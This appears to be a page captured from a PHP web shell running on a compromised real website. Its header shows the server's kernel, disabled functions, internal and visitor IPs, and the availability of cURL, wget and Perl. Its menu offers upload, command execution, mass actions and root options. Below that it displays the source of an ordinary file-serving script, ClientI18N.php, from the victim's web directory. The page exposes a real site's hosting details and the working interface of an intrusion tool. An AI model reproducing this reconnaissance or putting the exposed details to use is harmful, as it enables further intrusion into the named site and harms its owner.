Kernel : Linux webm039.cluster003.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Disable function : _dyuweyrj4,_dyuweyrj4r,dl
Safe mode : OFF
Host : www.mehariclubdefrance.com | Server ip : 10.3.20.37 | Your ip : 3.148.165.9 | Time @ Server : 12 May 2025 16:19:08
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/meharicl/home2/meharicl/www/recensement2/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/meharicl/home2/meharicl/www/recensement2/ClientI18N.php

<?php //Client @0-B0CA0DFA define("RelativePath", "."); define("PathToCurrentPage", ""); define("FileName", ""); include(RelativePath . "/Common.php"); $ClientFileEncoding = "UTF-8"; $AllowedFiles = array( "/^DatePicker\\.js$/" => "content-type: text/javascript; charset=$ClientFileEncoding", "/^Functions\\.js$/" => "content-type: text/javascript; charset=$ClientFileEncoding", "/^Globalize\\.js$/" => "content-type: text/javascript; charset=$ClientFileEncoding", "/^[\\w\\/]+_events\\.js$/" => "content-type: text/javascript; charset=$ClientFileEncoding" ); $file = CCGetFromGet("file"); foreach ($AllowedFiles as $FileMask => $FileType) { if (preg_match($FileMask, $file)) { $file_content = ""; $file_path = RelativePath . "/" . $file; if (file_exists($file_path)) { $fh = fopen($file_path, "rb"); if (filesize($file_path)) $file_content = fread($fh, filesize($file_path)); fclose($fh); $file_content = preg_replace_callback("/\\{res:\s*(\w+)\\}/is", function($matches) use ($CCSLocales, $FileEncoding, $ClientFileEncoding) { return CCConvertEncoding($CCSLocales->GetText($matches[1]), $FileEncoding, $ClientFileEncoding); }, $file_content); } header($FileType); echo $file_content; exit; } } //End Client ?>